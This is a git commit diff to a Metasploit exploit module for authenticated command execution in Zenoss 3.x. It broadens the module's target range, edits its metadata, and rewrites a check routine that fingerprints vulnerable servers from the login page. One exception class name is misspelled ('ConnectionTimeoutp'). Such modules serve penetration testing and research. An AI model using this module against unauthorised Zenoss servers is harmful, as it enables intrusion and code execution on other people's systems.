minor improvements to Zenoss showdaemonxmlconfig exploit
bcoles
parent
bdf8f1a543
commit
2bf0899d09
|
|
@ -6,7 +6,6 @@
|
||||||
##
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'msf/core/handler/reverse_tcp'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GoodRanking
|
Rank = GoodRanking
|
||||||
|
|
@ -15,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Zenoss <= 3.2.1 showDaemonXMLConfig Command Execution',
|
'Name' => 'Zenoss 3 showDaemonXMLConfig Command Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a command execution vulnerability in Zenoss <= 3.2.1
|
This module exploits a command execution vulnerability in Zenoss 3.x
|
||||||
which could be abused to allow authenticated users to execute arbitrary
|
which could be abused to allow authenticated users to execute arbitrary
|
||||||
code under the context of the 'zenoss' user. The show_daemon_xml_configs()
|
code under the context of the 'zenoss' user. The show_daemon_xml_configs()
|
||||||
function in the 'ZenossInfo.py' script calls Popen() with user
|
function in the 'ZenossInfo.py' script calls Popen() with user
|
||||||
|
|
@ -31,10 +30,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
],
|
],
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Brendan Coles <bcoles[at]gmail[dot]com>', # Discovery and exploit
|
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => '$Revision: 2 $',
|
'Version' => '$Revision: 3 $',
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'Arch' => ARCH_CMD,
|
'Arch' => ARCH_CMD,
|
||||||
'Platform' => 'unix',
|
'Platform' => 'unix',
|
||||||
|
|
@ -68,15 +67,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
|
||||||
|
@peer = "#{rhost}:#{rport}"
|
||||||
|
|
||||||
# retrieve software version from login page
|
# retrieve software version from login page
|
||||||
|
begin
|
||||||
res = send_request_raw({
|
res = send_request_raw({
|
||||||
'method' => "GET",
|
'method' => "GET",
|
||||||
'uri' => "/zport/acl_users/cookieAuthHelper/login_form"
|
'uri' => "/zport/acl_users/cookieAuthHelper/login_form"
|
||||||
})
|
})
|
||||||
return Exploit::CheckCode::Unknown if res.nil?
|
return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright © 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\./
|
||||||
return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright © 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\.2\.1<\/span>/
|
|
||||||
return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
|
return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
|
||||||
|
print_error("#{@peer} - Connection failed")
|
||||||
|
end
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
Loading…
Reference in New Issue